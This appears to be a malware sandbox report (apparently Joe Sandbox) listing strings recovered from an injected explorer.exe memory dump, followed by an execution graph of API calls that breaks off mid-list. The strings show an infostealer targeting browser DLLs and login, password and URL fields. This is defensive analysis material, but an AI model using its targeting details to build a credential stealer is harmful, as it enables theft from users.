Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction ID: 8f6e1607018daba595480b3576beba2b5a9fe5ac83b097927cc5d17886d28dcd
• Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction Fuzzy Hash: ECC19E71618A298FC758EF28D895ABAB3E1FB98304F91532D854ED7251DF30EA018BC5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction ID: 85c23028fe67a0d0af0782a542e680375c5f7f80feaf8a7dd072e2c9d2ee6afc
• Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction Fuzzy Hash: 49A1BF706187488BDB29EFA8D484BEEB7E1FF88304F00562DE58AD7241EF70D5458B89
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction ID: 9a007f35bbf709e02b3290afcad38788775e139c10af0d206a539f74db17a913
• Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction Fuzzy Hash: A991AF706187488BDB29EFA8D484BEEB7E1FF98304F00562DE58AD7241EF70D5458B89
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: $.$e$n$v
• API String ID: 0-1849617553
• Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction ID: dd37959d4458fd3851a218c56c9d273a2b9193110a22f6b1cd7a4b76fe976eb2
• Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction Fuzzy Hash: 35718031618B488FD758EFA8C4887AAB7F1FF98304F00162EE44AD7261EF71D9458B85
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                    • API String ID: 0-1970020201
                                                                                                                    • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                    • Instruction ID: 6438a365282485a7ad06c5ec70cd574764e3b09c86321778d0712bc480572cba
                                                                                                                    • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                    • Instruction Fuzzy Hash: 8F516BB0918B4C8FDB64EFA4C044AEEB7F1FF28300F41562E959AE7254EF3095418B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4$\$dll$ion.$vers
                                                                                                                    • API String ID: 0-1610437797
                                                                                                                    • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                    • Instruction ID: eab04c74b45d7f1d2424db1369ff457ec5d882476a6163b84ea38e900c756075
                                                                                                                    • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                    • Instruction Fuzzy Hash: AB417C34219B8C8BCB75EF2898457FAB3E4FB98305F41562E998EC7240EF30D5068782
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                    • API String ID: 0-327345718
                                                                                                                    • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                    • Instruction ID: 4dcf01e5539167c8961050dd393a05cf2fd6b8cf7a04ec0d341c1e564d188162
                                                                                                                    • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                    • Instruction Fuzzy Hash: E3416D34A58E1D8FCB58EF6880957FEB7E1FB68304F61516AA80EE7200DE70D5408B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$el32$h$kern
                                                                                                                    • API String ID: 0-4264704552
                                                                                                                    • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                    • Instruction ID: 06bc6be3f97a664da40f25e721b9518fff31b699a959be52c7678dad380d9959
                                                                                                                    • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                    • Instruction Fuzzy Hash: BB417B7460CB488FD7A9DF2880883BABBE1FBA8305F105A3E959EC2255DF70C545CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                    • API String ID: 0-3434893486
                                                                                                                    • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                    • Instruction ID: 3afc58e09bb56d076bc958399c48bae94aaf89c9954c131ac41e72c3db5faa13
                                                                                                                    • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                    • Instruction Fuzzy Hash: FB31E57150CB885FD71AEB28C4846EAB7D4FB94300F50591EE49BC7291EE30E64ACB43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                    • API String ID: 0-3434893486
                                                                                                                    • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                    • Instruction ID: ff8d58ebb67b207cb4bb5945d17cdc2641d8ed6cc2c75595cb72f617034c8ef4
                                                                                                                    • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                    • Instruction Fuzzy Hash: D031C17150CB486FD729EB28C485AFAB7D5FB94300F50591EE49BD7291EE30E606CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                    • API String ID: 0-3136806129
                                                                                                                    • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                    • Instruction ID: 05c85a6b83dd2c37e37e64239a7d2918ec6c8f21d6c0484e66abab81460e0789
                                                                                                                    • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                    • Instruction Fuzzy Hash: 96317E30218B584FCB84FF288495BAAB7E1FB98200F95666D954ECB255DF30D505CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                    • API String ID: 0-3136806129
                                                                                                                    • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                    • Instruction ID: 8c4f678bb2da3e1173b2c706c71cfdf2f46aa542a292cd91c0df14b1d1c461a5
                                                                                                                    • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                    • Instruction Fuzzy Hash: 9A319E3021CB584FCB94EF288494BAAB7E1FF98300F95662D954ECB255DF30D505CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 0-319646191
                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction ID: 395a5392cd9a811714b69ebe21b59ff73f271fe95ebbe299fd0ff7e8da6e8b5d
                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction Fuzzy Hash: 0B31CE31614A5C8BCF14EFA8C884BFEB7E1FF58204F45122AD54EE7240DE78C6458789
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 0-319646191
                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction ID: b0289cbd69fa4e42910d68020cf8a698e40c4029d53d9c70bb4bb5ec8361cf4d
                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction Fuzzy Hash: 4221CE31A14A5C8ACF15EFA8C884BFEBBA1FF58204F45522AD55AE7240DE74C6058B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$l$l$t
                                                                                                                    • API String ID: 0-168566397
                                                                                                                    • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                    • Instruction ID: 929f52395bb5e37b6a446eea97d0b5ffe3542871c3053aa99fb07516f9cfb59e
                                                                                                                    • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                    • Instruction Fuzzy Hash: 1C217A70A28A1E9BDB08EFA8C0847AEBAF0FF18314F50562ED109E3600DB74D5918B84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$l$l$t
                                                                                                                    • API String ID: 0-168566397
                                                                                                                    • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                    • Instruction ID: 47e619cc8e6c976b557ba0072723c89e6a37eb5bcdf4757e8f1bfb52ecd0e38f
                                                                                                                    • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                    • Instruction Fuzzy Hash: 2C215A74A28A1D9BDB08EFA8D4447EDBBF1FB18314F51562ED109E3A00DB74D5918B84
                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802
• Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction ID: 8148e895fd33b88a7e468eafee8179bbf29e4154b20a0403cb93cde25538b000
• Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction Fuzzy Hash: 0521CA30618B1D8BCB05DF9998807EEB7F1EF88344F00661EE40AEB244DBB0D9148BC2
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 2%
Signature Coverage: 0%
Total number of Nodes: 592
Total number of Limit Nodes: 70
                                                                                                                    execution_graph 97550 3332ad0 LdrInitializeThunk 97551 2949080 97562 294bd40 97551->97562 97553 294919c 97554 29490bb 97554->97553 97565 293acf0 97554->97565 97558 2949120 Sleep 97559 294910d 97558->97559 97559->97553 97559->97558 97574 2948ca0 LdrLoadDll 97559->97574 97575 2948eb0 LdrLoadDll 97559->97575 97563 294bd6d 97562->97563 97576 294a540 97562->97576 97563->97554 97566 293ad14 97565->97566 97567 293ad50 LdrLoadDll 97566->97567 97568 293ad1b 97566->97568 97567->97568 97569 2944e50 97568->97569 97570 2944e5e 97569->97570 97572 2944e6a 97569->97572 97570->97572 97583 29452d0 LdrLoadDll 97570->97583 97572->97559 97573 2944fbc 97573->97559 97574->97559 97575->97559 97577 294a55c NtAllocateVirtualMemory 97576->97577 97579 294af60 97576->97579 97577->97563 97580 294af70 97579->97580 97582 294af92 97579->97582 97581 2944e50 LdrLoadDll 97580->97581 97581->97582 97582->97577 97583->97573 97584 294f10d 97587 294b9d0 97584->97587 97588 294b9f6 97587->97588 97595 2939d40 97588->97595 97590 294ba02 97591 294ba26 97590->97591 97603 2938f30 97590->97603 97641 294a6b0 97591->97641 97644 2939c90 97595->97644 97597 2939d4d 97598 2939d54 97597->97598 97656 2939c30 97597->97656 97598->97590 97604 2938f57 97603->97604 98057 293b1c0 97604->98057 97606 2938f69 98061 293af10 97606->98061 97608 2938f86 97615 2938f8d 97608->97615 98132 293ae40 LdrLoadDll 97608->98132 97611 2938ffc 98077 293f410 97611->98077 97613 2939006 97614 294bf90 2 API calls 97613->97614 97637 29390f2 97613->97637 97616 293902a 97614->97616 97615->97637 98065 293f380 97615->98065 97617 294bf90 2 API calls 97616->97617 97618 293903b 97617->97618 97619 294bf90 2 API calls 97618->97619 97620 293904c 97619->97620 98089 293ca90 97620->98089 97622 2939059 97623 2944a50 8 API calls 97622->97623 97624 2939066 97623->97624 97625 2944a50 8 API calls 97624->97625 97626 2939077 97625->97626 97627 29390a5 
97626->97627 97628 2939084 97626->97628 97630 2944a50 8 API calls 97627->97630 98099 293d620 97628->98099 97636 29390c1 97630->97636 97632 29390e9 97634 2938d00 23 API calls 97632->97634 97634->97637 97635 2939092 98115 2938d00 97635->98115 97636->97632 98133 293d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97636->98133 97637->97591 97642 294af60 LdrLoadDll 97641->97642 97643 294a6cf 97642->97643 97676 2948bc0 97644->97676 97648 2939cb6 97648->97597 97649 2939cac 97649->97648 97683 294b2b0 97649->97683 97651 2939cf3 97651->97648 97694 2939ab0 97651->97694 97653 2939d13 97700 2939620 LdrLoadDll 97653->97700 97655 2939d25 97655->97597 97657 2939c40 97656->97657 98036 294b5a0 97657->98036 97660 294b5a0 LdrLoadDll 97661 2939c5b 97660->97661 97662 294b5a0 LdrLoadDll 97661->97662 97663 2939c71 97662->97663 97664 293f180 97663->97664 97665 293f199 97664->97665 98040 293b040 97665->98040 97667 293f1ac 98044 294a1e0 97667->98044 97670 2939d65 97670->97590 97672 293f1d2 97673 293f1fd 97672->97673 98050 294a260 97672->98050 97674 294a490 2 API calls 97673->97674 97674->97670 97677 2948bcf 97676->97677 97678 2944e50 LdrLoadDll 97677->97678 97679 2939ca3 97678->97679 97680 2948a70 97679->97680 97701 294a600 97680->97701 97684 294b2c9 97683->97684 97704 2944a50 97684->97704 97686 294b2e1 97687 294b2ea 97686->97687 97743 294b0f0 97686->97743 97687->97651 97689 294b2fe 97689->97687 97761 2949f00 97689->97761 98014 2937ea0 97694->98014 97696 2939ad1 97696->97653 97697 2939aca 97697->97696 98027 2938160 97697->98027 97700->97655 97702 294af60 LdrLoadDll 97701->97702 97703 2948a85 97702->97703 97703->97649 97705 2944a64 97704->97705 97706 2944d85 97704->97706 97705->97706 97769 2949c50 97705->97769 97706->97686 97709 2944b90 97772 294a360 97709->97772 97710 2944b73 97830 294a460 LdrLoadDll 97710->97830 97713 2944b7d 97713->97686 97714 2944bb7 97715 294bdc0 2 API calls 97714->97715 97716 2944bc3 97715->97716 97716->97713 97717 2944d49 97716->97717 97719 2944d5f 
97716->97719 97723 2944c52 97716->97723 97718 294a490 2 API calls 97717->97718 97720 2944d50 97718->97720 97839 2944790 LdrLoadDll NtReadFile NtClose 97719->97839 97720->97686 97722 2944d72 97722->97686 97724 2944cb9 97723->97724 97726 2944c61 97723->97726 97724->97717 97725 2944ccc 97724->97725 97832 294a2e0 97725->97832 97728 2944c66 97726->97728 97729 2944c7a 97726->97729 97831 2944650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97728->97831 97732 2944c97 97729->97732 97733 2944c7f 97729->97733 97732->97720 97788 2944410 97732->97788 97776 29446f0 97733->97776 97736 2944c70 97736->97686 97737 2944c8d 97737->97686 97739 2944d2c 97836 294a490 97739->97836 97740 2944caf 97740->97686 97742 2944d38 97742->97686 97744 294b101 97743->97744 97745 294b113 97744->97745 97746 294bd40 2 API calls 97744->97746 97745->97689 97747 294b134 97746->97747 97857 2944070 97747->97857 97749 294b180 97749->97689 97750 294b157 97750->97749 97751 2944070 3 API calls 97750->97751 97753 294b179 97751->97753 97753->97749 97889 2945390 97753->97889 97754 294b20a 97755 294b21a 97754->97755 97983 294af00 LdrLoadDll 97754->97983 97899 294ad70 97755->97899 97758 294b248 97978 2949ec0 97758->97978 97762 294af60 LdrLoadDll 97761->97762 97763 2949f1c 97762->97763 98008 3332c0a 97763->98008 97764 2949f37 97766 294bdc0 97764->97766 97767 294b359 97766->97767 98011 294a670 97766->98011 97767->97651 97770 294af60 LdrLoadDll 97769->97770 97771 2944b44 97770->97771 97771->97709 97771->97710 97771->97713 97773 294a376 97772->97773 97774 294af60 LdrLoadDll 97773->97774 97775 294a37c NtCreateFile 97774->97775 97775->97714 97777 294470c 97776->97777 97778 294a2e0 LdrLoadDll 97777->97778 97779 294472d 97778->97779 97780 2944734 97779->97780 97781 2944748 97779->97781 97783 294a490 2 API calls 97780->97783 97782 294a490 2 API calls 97781->97782 97785 2944751 97782->97785 97784 294473d 97783->97784 97784->97737 97840 294bfd0 LdrLoadDll RtlAllocateHeap 97785->97840 97787 294475c 97787->97737 97789 
294448e 97788->97789 97790 294445b 97788->97790 97792 29445d9 97789->97792 97796 29444aa 97789->97796 97791 294a2e0 LdrLoadDll 97790->97791 97793 2944476 97791->97793 97794 294a2e0 LdrLoadDll 97792->97794 97795 294a490 2 API calls 97793->97795 97800 29445f4 97794->97800 97797 294447f 97795->97797 97798 294a2e0 LdrLoadDll 97796->97798 97797->97740 97799 29444c5 97798->97799 97802 29444e1 97799->97802 97803 29444cc 97799->97803 97853 294a320 LdrLoadDll 97800->97853 97806 29444e6 97802->97806 97807 29444fc 97802->97807 97805 294a490 2 API calls 97803->97805 97804 294462e 97809 294a490 2 API calls 97804->97809 97810 29444d5 97805->97810 97808 294a490 2 API calls 97806->97808 97813 2944501 97807->97813 97841 294bf90 97807->97841 97811 29444ef 97808->97811 97812 2944639 97809->97812 97810->97740 97811->97740 97812->97740 97817 2944513 97813->97817 97844 294a410 97813->97844 97816 2944567 97818 294457e 97816->97818 97852 294a2a0 LdrLoadDll 97816->97852 97817->97740 97820 2944585 97818->97820 97821 294459a 97818->97821 97822 294a490 2 API calls 97820->97822 97823 294a490 2 API calls 97821->97823 97822->97817 97824 29445a3 97823->97824 97825 29445cf 97824->97825 97847 294bb90 97824->97847 97825->97740 97827 29445ba 97828 294bdc0 2 API calls 97827->97828 97829 29445c3 97828->97829 97829->97740 97830->97713 97831->97736 97833 294af60 LdrLoadDll 97832->97833 97834 2944d14 97833->97834 97835 294a320 LdrLoadDll 97834->97835 97835->97739 97837 294af60 LdrLoadDll 97836->97837 97838 294a4ac NtClose 97837->97838 97838->97742 97839->97722 97840->97787 97854 294a630 97841->97854 97843 294bfa8 97843->97813 97845 294af60 LdrLoadDll 97844->97845 97846 294a42c NtReadFile 97845->97846 97846->97816 97848 294bbb4 97847->97848 97849 294bb9d 97847->97849 97848->97827 97849->97848 97850 294bf90 2 API calls 97849->97850 97851 294bbcb 97850->97851 97851->97827 97852->97818 97853->97804 97855 294af60 LdrLoadDll 97854->97855 97856 294a64c RtlAllocateHeap 97855->97856 97856->97843 97858 2944081 
97857->97858 97859 2944089 97857->97859 97858->97750 97888 294435c 97859->97888 97984 294cf30 97859->97984 97861 29440dd 97862 294cf30 2 API calls 97861->97862 97865 29440e8 97862->97865 97863 2944136 97866 294cf30 2 API calls 97863->97866 97865->97863 97867 294d060 3 API calls 97865->97867 97995 294cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 97865->97995 97868 294414a 97866->97868 97867->97865 97869 29441a7 97868->97869 97989 294d060 97868->97989 97870 294cf30 2 API calls 97869->97870 97872 29441bd 97870->97872 97873 29441fa 97872->97873 97875 294d060 3 API calls 97872->97875 97874 294cf30 2 API calls 97873->97874 97876 2944205 97874->97876 97875->97872 97877 294d060 3 API calls 97876->97877 97884 294423f 97876->97884 97877->97876 97879 2944334 97997 294cf90 LdrLoadDll RtlFreeHeap 97879->97997 97881 294433e 97998 294cf90 LdrLoadDll RtlFreeHeap 97881->97998 97883 2944348 97999 294cf90 LdrLoadDll RtlFreeHeap 97883->97999 97996 294cf90 LdrLoadDll RtlFreeHeap 97884->97996 97886 2944352 98000 294cf90 LdrLoadDll RtlFreeHeap 97886->98000 97888->97750 97890 29453a1 97889->97890 97891 2944a50 8 API calls 97890->97891 97893 29453b7 97891->97893 97892 294540a 97892->97754 97893->97892 97894 2945405 97893->97894 97895 29453f2 97893->97895 97897 294bdc0 2 API calls 97894->97897 97896 294bdc0 2 API calls 97895->97896 97898 29453f7 97896->97898 97897->97892 97898->97754 98001 294ac30 97899->98001 97902 294ac30 LdrLoadDll 97903 294ad8d 97902->97903 97904 294ac30 LdrLoadDll 97903->97904 97905 294ad96 97904->97905 97906 294ac30 LdrLoadDll 97905->97906 97907 294ad9f 97906->97907 97908 294ac30 LdrLoadDll 97907->97908 97909 294ada8 97908->97909 97910 294ac30 LdrLoadDll 97909->97910 97911 294adb1 97910->97911 97912 294ac30 LdrLoadDll 97911->97912 97913 294adbd 97912->97913 97914 294ac30 LdrLoadDll 97913->97914 97915 294adc6 97914->97915 97916 294ac30 LdrLoadDll 97915->97916 97917 294adcf 97916->97917 97918 294ac30 LdrLoadDll 97917->97918 97919 294add8 97918->97919 97920 294ac30 
LdrLoadDll 97919->97920 97921 294ade1 97920->97921 97922 294ac30 LdrLoadDll 97921->97922 97923 294adea 97922->97923 97924 294ac30 LdrLoadDll 97923->97924 97925 294adf6 97924->97925 97926 294ac30 LdrLoadDll 97925->97926 97927 294adff 97926->97927 97928 294ac30 LdrLoadDll 97927->97928 97929 294ae08 97928->97929 97930 294ac30 LdrLoadDll 97929->97930 97931 294ae11 97930->97931 97932 294ac30 LdrLoadDll 97931->97932 97933 294ae1a 97932->97933 97934 294ac30 LdrLoadDll 97933->97934 97935 294ae23 97934->97935 97936 294ac30 LdrLoadDll 97935->97936 97937 294ae2f 97936->97937 97938 294ac30 LdrLoadDll 97937->97938 97939 294ae38 97938->97939 97940 294ac30 LdrLoadDll 97939->97940 97941 294ae41 97940->97941 97942 294ac30 LdrLoadDll 97941->97942 97943 294ae4a 97942->97943 97944 294ac30 LdrLoadDll 97943->97944 97945 294ae53 97944->97945 97946 294ac30 LdrLoadDll 97945->97946 97947 294ae5c 97946->97947 97948 294ac30 LdrLoadDll 97947->97948 97949 294ae68 97948->97949 97950 294ac30 LdrLoadDll 97949->97950 97951 294ae71 97950->97951 97952 294ac30 LdrLoadDll 97951->97952 97953 294ae7a 97952->97953 97954 294ac30 LdrLoadDll 97953->97954 97955 294ae83 97954->97955 97956 294ac30 LdrLoadDll 97955->97956 97957 294ae8c 97956->97957 97958 294ac30 LdrLoadDll 97957->97958 97959 294ae95 97958->97959 97960 294ac30 LdrLoadDll 97959->97960 97961 294aea1 97960->97961 97962 294ac30 LdrLoadDll 97961->97962 97963 294aeaa 97962->97963 97964 294ac30 LdrLoadDll 97963->97964 97965 294aeb3 97964->97965 97966 294ac30 LdrLoadDll 97965->97966 97967 294aebc 97966->97967 97968 294ac30 LdrLoadDll 97967->97968 97969 294aec5 97968->97969 97970 294ac30 LdrLoadDll 97969->97970 97971 294aece 97970->97971 97972 294ac30 LdrLoadDll 97971->97972 97973 294aeda 97972->97973 97974 